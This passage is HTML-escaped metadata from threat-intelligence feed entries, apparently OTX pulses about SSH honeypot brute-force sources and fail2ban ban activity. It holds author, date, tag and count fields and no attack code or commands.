sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'green',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[{'display_name':&nbsp;'T1110&nbsp;-&nbsp;Brute&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Force',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'T1110',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'Brute&nbsp;Force'}],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx20-web-media.s3.amazonaws.com/media/avatars/user_57145/resized/80/avatar_e6d4f7ac6f.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'57145',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_following':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribed':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username':&nbsp;'tjwang0324'},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cloned_from':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'comment_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'created':&nbsp;'2020-07-11T00:00:02.461000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'SSH&nbsp;honeypot&nbsp;authentication&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attempts',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'downvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'export_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'follower_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'groups':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'5f090102ecb3c00e215b0817',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_author':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_modified':&nbsp;True,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2020-08-10T00:09:58.078000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'254&nbsp;days&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'STU_Honeypots_Bruteforce_Source_IP&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'2020/07/10',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'api',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'IPv4',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;61,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;['Bruteforce',&nbsp;'Honeypot'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'green',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx.alienvault.com/assets/images/default-avatar.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'83377',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_following':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribed':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username':&nbsp;'projectopsec'},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cloned_from':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'comment_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'created':&nbsp;'2020-07-02T23:05:03.295000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'Previous&nbsp;24&nbsp;hours&nbsp;fail2ban&nbsp;Ban&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'activity&nbsp;from&nbsp;a&nbsp;GB&nbsp;hosted&nbsp;server',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'downvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'export_count':&nbsp;3,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'follower_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'groups':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'5efe681f0bcfbe1307e04a55',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;